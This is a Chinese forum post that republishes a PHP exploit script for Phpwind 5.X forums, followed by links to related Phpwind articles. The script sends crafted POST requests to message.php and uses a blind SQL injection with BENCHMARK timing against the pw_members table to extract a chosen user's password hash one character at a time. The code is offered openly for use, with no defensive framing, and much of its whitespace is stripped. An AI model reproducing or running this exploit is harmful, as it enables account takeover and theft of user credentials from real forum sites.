忘记什么时候我就拿到了,一直没发挥.由于某些原因一直没发出来,毕竟不是原创,现在有人帖出来了,我也放出来.程序代码 <?php print_r(\” +——————————————————————+ ExploitForPhpwind5.XVersion BYLoveshell JustForFun:) +——————————————————————+ \”); ini_set(\”max_execution_time\”,0); error_reporting(7); $bbspath=\”$argv[2]\”; $server=\”$argv[1]\”; $cookie=\’1ae40_lastfid=0;1ae40_ol_offset=776;1ae40_ck_info=%2F%09.72m.net;1ae40_winduser=A1QKBgE9UFxUUwAHDloFUAMIAFxeUgIMWgFUVVYDAA8HBFQNUVA%3D;1ae40_lastvisit=0%091173612527%09%2Fbbs%2Findex.php%3F; $useragent=\”Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;SV1)\”; $uid=intval($argv[3])>0?intval($argv[3]):1; echo\”\\r\\n#Logging\\t……..\”; if(islogin())echo\”LoginOk!\\r\\n\”; elsedie(\”NotLogin!\\tCheckYourCookieandUseragent!\\r\\n\”); echo\”#Testing\\t……..\”; if(test())echo\”Vul!\\r\\n\”; elsedie(\”NotVul\”); $hashtable=\’0123456789abcdef\’; $count=0; echo\”#Cracking\\t\\r\\n\\r\\n\”; for($i=1;$i<=16;$i++){ echo\”第\\t$i\\t位:\”; $subpass=crack($i+8); $password=$password.$subpass; echo\”$subpass\\r\\n\”; } echo\”Password:\\t$password\”; echo\”\\r\\nGoodLuck$countTimes\\r\\n\”; functionsend($cmd,$path) { global$bbspath,$server,$cookie,$count,$useragent,$debug,$evilip; $path=$bbspath.\”$path\”; $message=\”POST\”.$path.\”HTTP/1.1\\r\\n\”; $message.=\”Accept:*/*\\r\\n\”; $message.=\”Accept-Language:zh-cn\\r\\n\”; $message.=\”Referer:http://\”.$server.$path.\”\\r\\n\”; $message.=\”Content-Type:application/x-www-form-urlencoded\\r\\n\”; $message.=\”User-Agent:\”.$useragent.\”\\r\\n\”; $message.=\”Host:\”.$server.\”\\r\\n\”; $message.=\”Content-length:\”.strlen($cmd).\”\\r\\n\”; $message.=\”Connection:Keep-Alive\\r\\n\”; $message.=\”Cookie:\”.$cookie.\”\\r\\n\”; $message.=\”\\r\\n\”; $message.=$cmd.\”\\r\\n\”; $count=$count+1; $fd=fsockopen($server,80); fputs($fd,$message); $resp=\”<pre>\”; while($fd&&!feof($fd)){ $resp.=fread($fd,1024); } fclose($fd); $resp.=\”</pre>\”; if($debug){echo$cmd;echo$resp;} //echo$resp; return$resp; } functionsqlject($sql){ global$uid; $data=\’action=pubmsg&readmsg=0)\’; $data=$data.\”unionselectBENCHMARK(1000000,md5(12345))frompw_memberswhereuid=$uidand$sql\”.\’/*\’; $echo=send($data,\’message.php\’); preg_match(\”/Total(.*)\\(/i\”,$echo,$matches); if($matches[1]>2)return1; elsereturn0; } functiontest(){ global$uid; $data=\’action=pubmsg&readmsg=0)\’; $echo=send($data,\’message.php\’); if(strpos($echo,\’MySQLServerError\’))return1; elsereturn0; } functionislogin(){ global$uid; $data=\’action=pubmsg&readmsg=0)\’; $echo=send($data,\’message.php\’); if(strpos($echo,\’login.php\”\’))return0; elsereturn1; } functioncrack($i){ global$hashtable; $sql=\”mid(password,$i,1)>0x\”.bin2hex(\’8\’); if(sqlject($sql)){ $a=8; $b=15;} else{ $a=0; $b=8; } for($tmp=$a;$tmp<=$b;$tmp++){ $sql=\”mid(password,$i,1)=0x\”.bin2hex($hashtable[$tmp]); if(sqlject($sql))return$hashtable[$tmp]; } crack($i); } ?>点击下载此文件
您可能感兴趣的文章:
- PHPWind与Discuz截取字符函数substrs与cutstr性能比较
- PHPwind整合最土系统用户同步登录实现方法
- PHPWind 发帖回帖Api PHP版打包下载
- PHPWIND 5.3 运行代码 功能实现代码
- phpwind管理权限泄露漏洞利用程序发布
- 关于phpwind克隆用户的方法
- php heredoc和phpwind的模板技术使用方法小结
- PHP 优化配置——加速你的VBB,phpwind,Discuz,IPB,MolyX
- phpwind中的数据库操作类
- PHPWind9.0手动屏蔽验证码解决后台关闭验证码但是依然显示的问题
